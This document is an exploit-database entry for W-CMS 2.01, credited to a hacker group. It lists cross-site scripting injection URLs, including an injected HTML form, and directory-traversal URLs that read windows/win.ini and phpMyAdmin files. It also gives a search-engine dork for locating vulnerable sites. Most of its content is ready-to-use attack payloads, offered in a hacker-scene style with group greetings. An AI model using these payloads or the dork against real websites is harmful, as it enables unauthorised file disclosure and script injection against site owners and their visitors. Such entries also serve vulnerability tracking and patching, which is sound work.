w-cms 2.01 - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType

W-CMS 2.01 multiple vulnerabilities including cross-site scripting and directory traversal attack


                                                # Exploit Title: W-Cms Multiple Vulnerability
# Date: 2012-01-09
# Author: th3.g4m3_0v3r
# Site:http://w-cms.info/
# Software Link: http://code.google.com/p/wcms/
# Dork: intext:&#34;Powered by w-CMS&#34;
# Version : [2.01]
# Tested on: Window 7
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.h4ck3r.in            www.root-team.com             www.hackingmind.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

W-CMS cross site scripting
_______________

Vulnerable Link __________\/_____________________
_______________

http://localhost/index.php?bid=1&COMMENT=1 &#34;XSS&#34;
http://localhost/?p=3&#34;XSS&#34;
http://localhost/?bid=5&p=1&#34;XSS&#34;


http://localhost/?p=3&#60;FORM action=&#34;Default.asp?PageId=-1&#34; 
method=POST id=searchFORMname=searchFORM
  style=&#34;margin:0;padding:0&#34;&#62;&#60;INPUT type=&#34;hidden&#34; value=&#34;&#34; 
name=&#34;txtSEARCH&#34;&#62;&#60;/FORM&#62;

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks

This script is possibly vulnerable to directory traversal attacks

http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1